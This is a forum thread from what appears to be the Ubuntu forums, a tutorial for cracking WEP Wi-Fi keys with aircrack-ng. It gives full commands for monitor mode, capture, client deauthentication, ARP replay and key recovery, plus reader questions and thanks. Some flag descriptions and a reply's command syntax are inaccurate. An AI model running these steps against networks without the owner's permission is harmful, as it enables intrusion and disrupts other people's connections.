View Poll Results: Has this thread been helpful?

Voters
694. You may not vote on this poll
  • Yes

    537 77.38%
  • No

    46 6.63%
  • Somewhat

    111 15.99%
Page 1 of 77 1231151 ... LastLast
Results 1 to 10 of 769

Thread: HOWTO: Aircrack-NG (Simple Guide)

  1. #1
    Join Date
    May 2006
    Location
    100acrewood
    Beans
    7,480
    Distro
    Kubuntu 14.04 Trusty Tahr

    HOWTO: Aircrack-NG (Simple Guide)

    Before you continue to follow this tutorial, you might want to take a look at pyCracker, a useful tool which - hopefully - will make the whole process a littler simpler for you.

    This HOWTO is widely based on Aircrack's own documentation. In addition you'll find the latest version of "Aircrack Next Generation" here and Aircrack-PTW here.

    Any suggestions for improvement are welcome. Aim is to keep this HOWTO as simple & comprehensive as possible as I believe that brevity is the soul of wit.

    DISCLAIMER:
    Note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network's security prior to obtaining approval from the owner of the network, and no support will be given to users who seek to do otherwise.

    GENERAL INFORMATION:
    Generally speaking there are 3 types of attacks:

    1. Brute force attack
    2. Dictionary attack
    3. Statistical attack

    By exploiting several security weaknesses of the WEP protocol Aircrack NG makes use of a statistical method to recover WEP keys. Provided that you have collected a sufficient number of IVs (= Initialization Vectors) and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.

    HARDWARE:
    I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won't go into this. I have tested packet injection and decryption with:

    1. Intel® PRO/Wireless 2200BG (IPW2200)
    2. Linksys WUSB54G V4.0 (RT2570)

    I recommend "Linksys WUSB54G V4.0" as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.

    DRIVERS & PATCHES:
    Before you proceed you need to compile your own drivers & install patches for packet re-injection. You find instructions here.

    PREREQUISITES:
    1. You have successfully patched your wireless driver (see link above).
    2. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
    3. '00:09:5B:D7:43:A8' is the MAC address of my network, so you need to replace it with your own.
    4. '00:00:00:00:00:00' is the MAC address of the target client, NOT that of your own wireless card.

    COMMAND LINE:
    Please make sure that you stick to the exact sequence of actions and pay attention to section on MAC filtering.

    • 1. Enable monitoring with "airmon-ng" (screenshot #1):
      sudo airmon-ng start <interface> <channel>


    • 2. Packet capturing with "airodump-ng" (screenshot #2):
      sudo airodump-ng --channel <channel> --write <file_name> <interface>
      Alternatively, try this (to collect data from target network only and hence increase performance):
      sudo airodump-ng --channel <channel> --bssid 00:09:5B:D7:43:A8 --write <file_name> <interface>
      NOTE:
      --channel... Select preferred channel; optional, however, channel hopping severely impacts and thus slows down collection process.
      --bssid... MAC address of target access point; optional, however, specifying access point will improve performance of collection process.
      --write... Preferred file name; mandatory field (in our case).


    • 3.1. Now check if MAC filtering is enabled or turned off:
      sudo aireplay-ng -1 0 -e <target_essid> -a 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>
      NOTE:
      -1... '0' deauthenticates all clients.
      -e... ESSID of target access point.
      -a... MAC address of target access point.
      -h... MAC address of your choice.


    • 3.2. If the resulting output looks like this...
      18:22:32 Sending Authentication Request
      18:22:32 Authentication successful
      18:22:32 Sending Association Request
      18:22:32 Association successful :-)
      ...then MAC filtering is turned off & you can continue following section 'No MAC filtering', otherwise jump to section 'MAC filtering'.

    >> No MAC filtering <<

    • 4. Packet Re-injection with "aireplay-ng" (screenshot #4):
      sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>
      You'll now see the number of data packets shooting up in 'airodump-ng'. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point. As MAC filtering is off, use an arbitrary MAC address ('MY:MA:CA:DD:RE:SS').

      Continue with #6.

      NOTE:
      -3... Standard ARP-request replay.
      -b... MAC address of target access point.
      -h... MAC address of your choice.

    >> MAC filtering <<

    • 4. Deauthentication with "aireplay-ng" (screenshot #3):
      sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00 <interface>
      NOTE:
      -0... Number of deauthentication attempts.
      -a... MAC address of target access point.
      -c... Client MAC address.


    • 5. Packet Re-injection with "aireplay-ng" (screenshot #4):
      sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00 <interface>
      You'll now see the number of data packets shooting up in 'airodump-ng'. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point.

      NOTE:
      -3... Standard ARP-request replay.
      -b... MAC address of target access point.
      -h... Client MAC address.


    • 6. Decryption with "aircrack-ng" & "aircrack-ptw" (screenshot #5):

      Aircrack-ng:
      sudo aircrack-ng <file_name>.cap
      Aircrack-PTW:
      ./aircrack-ptw <file_name>.cap

    CAPTURING:
    This is a summary based on information given here and there, respectively:

    Aircrack-NG:
    64-bit key: ~250,000 packets
    128-bit key: ~1,500,000 packets

    Aircrack-PTW:
    64-bit key: ~20,000 packets [estimate]
    128-bit key: ~85,000 packets

    FINALLY:
    That's it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.

    CHANGE LOG:
    17/08/2007: First version (wieman01).
    20/08/2007: Aircrack-PTW extension (wieman01).
    09/11/2007: General overhaul after a long break ;-) and extension with regard to MAC filtering (wieman01).
    22/12/2008: Update driver patches (wieman01).
    27/01/2009: Note on pyCracker (wieman01).
    Attached Images Attached Images
    Last edited by wieman01; January 27th, 2009 at 07:08 PM.

  2. #2
    Join Date
    Aug 2007
    Beans
    17

    Re: HOWTO: Aircrack-NG (Simple Guide)

    nice thx

  3. #3
    Join Date
    May 2006
    Location
    100acrewood
    Beans
    7,480
    Distro
    Kubuntu 14.04 Trusty Tahr

    Re: HOWTO: Aircrack-NG (Simple Guide)

    Quote Originally Posted by wifi-staff View Post
    nice thx
    Let me know if it works for you. If not, suggestions are appreciated. I'll extend it further and briefly explain Aircrack-PTW which is much faster then Aircrack-NG.

  4. #4
    Join Date
    Apr 2007
    Location
    Central Arkansas
    Beans
    85
    Distro
    Ubuntu 7.04 Feisty Fawn

    Re: HOWTO: Aircrack-NG (Simple Guide)

    how do you find the mac address of an access point of a router you are not connected to in the first place? by using the airodump-ng?? it sometimes says "not associated" under bssid (what does that mean)?
    also are you going to make a guide for WPA??
    Screw the fact that it's taking 35% of my CPU power, and that it's drinks my battery power like a thirsty bedouin, that's what eyecandy is all about
    --9a3eedi

  5. #5
    Join Date
    May 2006
    Location
    100acrewood
    Beans
    7,480
    Distro
    Kubuntu 14.04 Trusty Tahr

    Re: HOWTO: Aircrack-NG (Simple Guide)

    Quote Originally Posted by AndrewGene View Post
    how do you find the mac address of an access point of a router you are not connected to in the first place? by using the airodump-ng?? it sometimes says "not associated" under bssid (what does that mean)?
    Yes, simply start "airodump-ng" and you'll see all available networks (both APs and clients).
    sudo airodump-ng start <interface> <channel>
    Quote Originally Posted by AndrewGene View Post
    also are you going to make a guide for WPA??
    I would love to but WPA is an entirely different topic. You cannot use statistical methos to crack the key like you do with WEP. WPA is much more secure and does not suffer the same flaws as WEP.
    Last edited by wieman01; August 23rd, 2007 at 07:21 AM.

  6. #6
    Join Date
    Apr 2007
    Location
    India
    Beans
    Hidden!
    Distro
    Ubuntu 9.04 Jaunty Jackalope

    Re: HOWTO: Aircrack-NG (Simple Guide)

    Very nice and detailed guid Thanks a ton

  7. #7
    Join Date
    Aug 2007
    Beans
    9

    Re: HOWTO: Aircrack-NG (Simple Guide)

    Yeah very nice

  8. #8
    Join Date
    Jul 2007
    Location
    US
    Beans
    33
    Distro
    Ubuntu 7.04 Feisty Fawn

    Re: HOWTO: Aircrack-NG (Simple Guide)

    Thanks

  9. #9
    Join Date
    Apr 2007
    Location
    Central Arkansas
    Beans
    85
    Distro
    Ubuntu 7.04 Feisty Fawn

    Re: HOWTO: Aircrack-NG (Simple Guide)

    Quote Originally Posted by wieman01 View Post
    Yes, simply start "airmon-ng" and you'll see all available networks (both APs and clients).


    I would love to but WPA is an entirely different topic. You cannot use statistical methos to crack the key like you do with WEP. WPA is much more secure and does not suffer the same flaws as WEP.

    First, my airmon-ng command only puts my card in monitor mode. It doesn't show networks--not even my own WEP network.

    Second, back whenever crimemachine.com (just the name of a network auditing site) was up and running they had tutorial videos of how to safely audit networks. They actually said that WPA is quicker to crack (using the tools mentioned above) than WEP--albiet a less common solution--becuase when they were fixing the problems with WEP they created another one in WPA. I believe this is why there are two versions of WPA protection.
    Screw the fact that it's taking 35% of my CPU power, and that it's drinks my battery power like a thirsty bedouin, that's what eyecandy is all about
    --9a3eedi

  10. #10
    Join Date
    May 2006
    Location
    100acrewood
    Beans
    7,480
    Distro
    Kubuntu 14.04 Trusty Tahr

    Re: HOWTO: Aircrack-NG (Simple Guide)

    Quote Originally Posted by AndrewGene View Post
    First, my airmon-ng command only puts my card in monitor mode. It doesn't show networks--not even my own WEP network.
    "airodump-ng" of course... my fault. I have corrected the other post.
    Quote Originally Posted by AndrewGene View Post
    Second, back whenever crimemachine.com (just the name of a network auditing site) was up and running they had tutorial videos of how to safely audit networks. They actually said that WPA is quicker to crack (using the tools mentioned above) than WEP--albiet a less common solution--becuase when they were fixing the problems with WEP they created another one in WPA. I believe this is why there are two versions of WPA protection.
    WPA is WEP based and was meant as an interim solution, you're right. And there are ways to perform attacks against WPA networks as well, I found some stuff here. I just takes way more time & effort as far as I know as you are limited to brute-force and dictionary attacks. Nevertheless it's possible.

    Tell you what... Since I don't know much concerning I'll keep looking for possible solutions/approaches. I cannot promise but I'll see what is available and keep you posted. If you come across something interesting in return I would appreciate if you posted your results here.

Page 1 of 77 1231151 ... LastLast

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •